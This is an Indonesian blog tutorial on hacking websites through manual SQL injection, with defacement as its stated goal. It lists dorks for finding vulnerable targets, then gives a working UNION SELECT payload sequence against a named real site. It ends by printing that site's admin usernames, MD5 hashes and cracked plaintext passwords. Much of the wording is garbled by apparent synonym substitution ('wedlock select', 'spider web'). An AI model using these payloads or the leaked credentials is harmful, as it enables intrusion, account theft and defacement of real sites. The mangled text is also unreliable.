Update, Cara Hack Website Dengan Sql Injeksi

Hallo kawan bagaimana kabarnya?
oke kali ini saya membuat tutorial bagaimana cara hack website dengan sql injeksi manual:v
kok caranya manual sih:v
kenapa tidak pakai aplikasi saja:v
sebenernya banyak aplikasi untuk hack website dengan metode sql injeksi
seperti programme havij,sqlmap kalau di hp bisa pakai DroidSqli.
tp saya lebih suka sql injeksi manual karena kelebihanya kita bisa menginjeksi di halaman user/member yang akan kita gunakan mencari põrnikas agar kita bia menginjeksi database dan mencari username dan password admin, Coba kalian fikirkan apakah aplikasi bisa menginjeksi põrnikas di halaman admin? tidak mungkin bisa bro karena akan di redirect ke halaman login


Oke langsung saja simafk tutorialnya.

Bagaimana cara mengetahui spider web tersebut vuln sqli?

Untuk mengetahui spider web tersebut vuln sqli atau terkena celah sqli adalah dengan cara membuat fault url tersebut, dengan menambahkan karakter (') pada id di akhir url, 

contoh: target.com/index.php?id=sql'
            target.com/index.php?id=1'

Pertama-tama kita cari target dengan dork, anggap saja kalian udah pada mengerti, ini saya kasih contoh dork, kalian kembangin lagi sendiri.

inurl:play_old.php?id=
inurl:games.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=

Dan saya sudah punya target www.mywaymedia.it/readMore.php?id=15

Selanjutnya kita coba examination spider web tersebut vuln atau tidak dengan menambahkan karakter (') , maka jadinya seperti ini www.mywaymedia.it/readMore.php?id=15'


Dan ternyata fault  
Notice: Use of undefined constant Errore - assumed 'Errore' inward /var/www/www.mywaymedia.it/readMore.php on trouble 15ErroreYou convey an fault inward your SQL syntax; cheque the manual that corresponds to your MySQL server version for the correct syntax to purpose close ''' at trouble 1
Untuk fault website berbeda-beda
Berikut contoh-contoh fault pada spider web yang terkena celah SQL Injection
  • You convey an fault inward your SQL syntax;
  • Warning: mysql_fetch_array()
  • Warning: mysql_num_rows()
Dan masih banyak lagi, bukan hanya fault aja, spider web blank atau ada information yg hilang itu juga tanda vuln,



Disini saya akan menggunakan add together ons hakbar untuk mempermudah menginjeksinya, yang belum punya bisa pasang disini,
Kalau sudah untuk menampilkan hakbar tekan F9,
Lanjut menginjeksi
Sekarang kita akan mencari berapa jumlah column database site itu dengan menambahkan perintah gild by, tambahkan + untuk spasi, jadi perintahnya seperti ini 
www.mywaymedia.it/readMore.php?id=15+order+by+1--
Lalu klik Execute Nanti spider web akan kembali normal, 


lalu ganti angka 1 ke angka two dan seterusnya sampai ketemu fault lagi agar lebih jelas lihat gambar dibawah
Disini saya menemukan errornya di order+by +5--


Berati kita sudah menemukan jumlah column database 4, loh kok 4? sedangkan disitu errornya di 5,
Begini saya jelaskan, setelah kita memasukan perintah gild past times 1 sampe iv tidak ada fault dan errornya di angka five secara logika berati di column five tidak ada di database site tersebut, jadi column database cuma sampe iv aja, kurang lebih begitu.
Lanjut.
Selanjutnya kita masukan perintah wedlock select, ganti gild past times dengan +union+select+1,2,3,4-- dan sebelum angka di belakang url tersebut tambahkan tanda (-), maksud 1,2,3,4 itu adalah angka column tadi,
Maka perintahnya seperti berikut,
www.mywaymedia.it/readMore.php?id=-15+union+select+1,2,3,4--
maka nanti kita akan mendapatkan sebuah angka, disini saya mendaptkan angka iii dan 4,


Kedua angka itu sebenarnya sama, kita pilih salah 1, saya memilih angka iii untuk tahap selajutnya,
Sekarang kita lihat berapa version database site tersebut, ganti angka iii di wedlock direct tadi dengan perintah @@version , maka perintahnya seperti berikut,
www.mywaymedia.it/readMore.php?id=-15+union+select+1,2,@@version,4--



Nah kita tau version database tersebut 5.1.73 berati bisa kita lanjut, karena version iv agak rumit, tapi rata-rata version five keatas,

Selanjutnya @@version kita ganti dengan perintah group_concat(table_name) dan di akhir angka sebelum tanda -- tadi masukan perintah from+information_schema.tables+where+table_schema=database()
Maka perintahnya seperti berikut.
www.mywaymedia.it/readMore.php?id=-15+union+select+1,2,group_concat(table_name),4+from+information_schema.tables+where+table_schema=database()--
Maka nanti kita akan mendapatkan nama-nama tabular array di database tersebut


Disini saya mendapatkan nama-nama tabular array news,news_utf,tbl_users

Karena kita disini tujuanya deface berati kita mencari user dan password admin, berati kita cari tabular array yang kemungkinan itu tabular array admin, seperti admin dll,
disini saya mendapatkan tabular array tbl_users 
Selanjutnya kita ganti group_concat(table_name) menjadi group_concat(column_name) dan from+information_schema.tables+where+table_schema= menjadi from+information_schema.columns+where+table_name= kemudian database() kita ganti dengan tabular array tbl_users yang sudah kita rubah dengan decimal, mengubah decimal bisa mengunakan tools disini atau bisa langsung menggunakan hakbar.

kalau saya disini langsung menggunakan hakbar, caranya dengan cara klik SQL > MySQL > MySQL CHAR(), selanjutnya masukan nama table, maka akan jadi seperti berikut CHAR(116, 98, 108, 95, 117, 115, 101, 114, 115)
Maka perintahnya seperti berikut
www.mywaymedia.it/readMore.php?id=-15+union+select+1,2,group_concat(column_name),4+from+information_schema.columns+where+table_name=CHAR(116, 98, 108, 95, 117, 115, 101, 114, 115)--
Maka nanti kita akan mendapatkan nama-nama isi di tabular array tbl_users,
Disini saya mendapatkan nama-nama tabular array user_id,user_name,user_pass,user_lastaccess


Disini sudah terlihat nama tabular array user_name dan user_pass berati langkah selajutnya melihat datanya

Ganti group_concat(column_name) menjadi group_concat(user_name,0x3a,user_pass) untuk 0x3a itu decimal dari tanda (:)
Dan ganti from+information_schema.columns+where+table_name=CHAR(116, 98, 108, 95, 117, 115, 101, 114, 115) menjadi from+tbl_users
Maka perintahnya seperti berikut
www.mywaymedia.it/readMore.php ?id=-15+union+select+1,2,group_concat(user_name,0x3a,user_pass),4+from+tbl_users--



Dan kita sudah mendapatkan username dan password site tersebut
publishing@vivacom.com:67e84f9ebb0d4a3f782d61edc9a91528
myway:a17e60c21d70e8d576e4d1dfce3ba1f8 

User: publishing@vivacom.com
Password:  67e84f9ebb0d4a3f782d61edc9a91528
dan
User: myway
Password:  a17e60c21d70e8d576e4d1dfce3ba1f8

Untuk password masih berbentuk hash MD5, bisa kalian crack disini,


Maka akan muncul password aslinya 

67e84f9ebb0d4a3f782d61edc9a91528 MD5 : 190773_v
a17e60c21d70e8d576e4d1dfce3ba1f8 MD5 : 12MMant


Maka hasilnya seperti berikut

User:  publishing@vivacom.com
Password: 190773_v
dan
User:  myway
Password:  12MMant

Selesai.

Comments

Popular posts from this blog

Update, Download 10+ Peel Bussid / Jitney Simulator Indonesia Keren

Update, License Fundamental Smadav

Update, Cara Membuat Stiker Whatsapp Menggunakan Foto Sendiri